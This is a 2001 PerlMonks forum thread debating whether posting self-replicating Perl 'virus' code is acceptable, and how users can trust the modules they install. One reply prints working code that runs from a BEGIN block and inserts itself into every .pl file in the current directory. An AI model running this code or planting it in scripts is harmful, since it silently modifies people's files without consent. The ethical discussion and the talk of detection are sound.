Re: Immoral?

I agree with you, fellow monks.

I ++ tachyon for creating smart code (which I cannot see, but sure it is), and ++ tye for hiding it from me - in 15 minutes after it was posted. But - it was posted for full 15 minutes!

I am sure it will be interesting to see the code, but I agree with andreychek there should by non-public place to discuss these things.

Most experienced monks are "saints" for a reason. They will not do harm even if they can. Less experienced malicious perl coder may be here lurking around. Do not provide him a tool to do wrong. Let him earn experience - when he will be able to build a virus, hopefully he will be saint and will not want to do it.

Updated

So from now on, I should be scared to install any perl module, because I always need to analyze it if it does not contain perl source-code virus? Can I hope that CPAN testers will be able to catch virus posted in CPAN site?

Maybe smart saint monks might to get together, analyze virus, analyze virus cleaner, and put together some script parser to check for known virus concepts, and also some heuristic search for tricks possibly being used, to give me a warning which lines are suspicious?

I was just looking for a module on ActiveState site. Now I will do it anyway, but I definitely will read the source code - and learn something...

So I need to be concerned with tricks including SEEK and <DATA>, right?

pmas

To make errors is human. But to make million errors per second, you need a computer.

Comment on Re: Immoral?

Replies are listed 'Best First'.
Re: Immoral? by Abigail (Deacon) on Jun 28, 2001 at 03:18 UTC
So I need to be concerned with tricks including SEEK and <DATA>, right? Wrong. Virusses can be "implanted" in many ways, not needing <DATA> or `seek`. Here's some code I posted to Usenet several years ago; if you run it, it will try to infect all files ending in ".pl" in the current directory. It won't do anything but try to replicate itself. It does its business from a `BEGIN` block, so even running it with `-c` cause replication. `#!/opt/perl/bin/perl -w use strict; # HACKED BEGIN { local ME; if (open ME, $0) { local $/; my $me = <ME>; my ($text) = $me =~ /(# HACKED\n.?# HACKED\n)/s; if (opendir DIR, ".") { foreach my $file (readdir DIR) { next unless $file =~ /.pl$/; local *FILE; if (open FILE, "+< ./$file") { my $program = <FILE>; unless ($program =~ /# HACKED/) { $program =~ s/\n/\n$text/; } seek FILE, 0, 0; print FILE $program; } close FILE; } } closedir DIR; } close ME; } # HACKED __END__` [download] -- Abigail	[reply] [d/l] [select]
Re: Re: Immoral? by blakem (Monsignor) on Jun 29, 2001 at 11:11 UTC
Not to pick a nit (I agree with your general point) but the above code does use seek... around line 20 you have `seek FILE, 0, 0; print FILE $program;` [download] -Blake	[reply] [d/l]
Re: Immoral? by Abigail (Deacon) on Jun 29, 2001 at 11:29 UTC
Sure, it uses `seek` (you could easily avoid that, just reopen the file), but the point is that the `seek` isn't in the program to be attacked. It's not that not using `seek` makes your programs more secure. -- Abigail	[reply] [d/l] [select]
Re: Re: Immoral? by andreychek (Parson) on Jun 27, 2001 at 20:46 UTC
pmas, I think you did a good job at summing things up. Let me be a devil's advocate for a moment. My question is -- where exactly does the point lie where code becomes a hazard? The code originally written on this could modify perl scripts in the current directory, and it was removed because it was deemed dangerous. Now, where exactly is the line drawn that seperates code that is "okay" from something that should not be posted? In this case, the code was drawn up in the first place due to this post, by chromatic. In fact, chromatic's original post was rated quite high (and yes, I had to use a vote on it right now to figure that out ;-) Nobody seemed to object to that particular post. The code in this post was removed because it gave a working example of how to create something virus-like. But by leaving Chromatic's post, aren't we saying that it's fine to write a virus, here's how to get started, we just aren't going to show you the exact code.. meaning that the person has to be at a particular skill level to make it work. So in essance, it would seem as if we are leaving virus writting for the more skilled Perl programmers, and simply keeping the script kiddies off the street for the moment. Again, I'm saying all of this as devil's advocate. However, the question I am posing is this-- how do we know when to remove code? What if what was posted could be used for good as well as bad, is it worth keeping it then? What if self modifying code could be used as a fancy form of "perl -i blah"? What if "perl -i blah" could be used as a virus? Just some thoughts to ponder :-) -Eric	[reply]
Re: Re: Re: Immoral? by chromatic (Archbishop) on Jun 27, 2001 at 21:16 UTC
A three-month Perl programmer could write a program that adds similar 'viral' code to all of the Perl programs or modules or CGI scripts in the current directory. The biggest thing tachyon does differently is to use *DATA to store the code and seek to rewind the pseudo file. Anyone who's capable of writing code that will search for files with a particular extension, open the file and insert a varying number of lines after the first line of each file is capable of writing something similar. Most people here could have done that within a few weeks of learning Perl. Several could have done that in their first week. That's not to say there are better examples tachyon could have chosen :), but does his code give someone a grand weapon of ferocious power? No. We already have that. It's called Perl.	[reply]